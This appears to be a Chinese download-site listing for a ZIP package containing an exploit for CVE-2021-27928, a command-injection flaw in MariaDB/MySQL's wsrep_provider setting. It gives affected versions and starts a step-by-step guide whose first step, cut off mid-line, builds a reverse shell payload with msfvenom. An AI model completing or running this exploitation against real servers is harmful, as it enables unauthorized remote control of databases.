CVE-2021-27928:CVE-2021-27928 MariaDBMySQL-'wsrep provider' 命令注入漏洞

时间:2021-04-16 10:27:54
【文件属性】:
文件名称:CVE-2021-27928:CVE-2021-27928 MariaDBMySQL-'wsrep provider' 命令注入漏洞
文件大小:1.38MB
文件格式:ZIP
更新时间:2021-04-16 10:27:54
信息 Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution Date: 03/18/2021 Exploit Author: Central InfoSec Version: MariaDB 10.2 before 10.2.37 10.3 before 10.3.28 10.4 before 10.4.18 10.5 before 10.5.9 Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL Tested on: Linux CVE : CVE-2021-27928 如何利用 步骤1:建立反向Shell有效负载 msfvenom -p linux/x64/shel
【文件预览】:
CVE-2021-27928-main
----README.md(1KB)
----img()
--------nc.png(175KB)
--------payload.png(637KB)
--------shell.png(364KB)
--------scp.png(236KB)

网友评论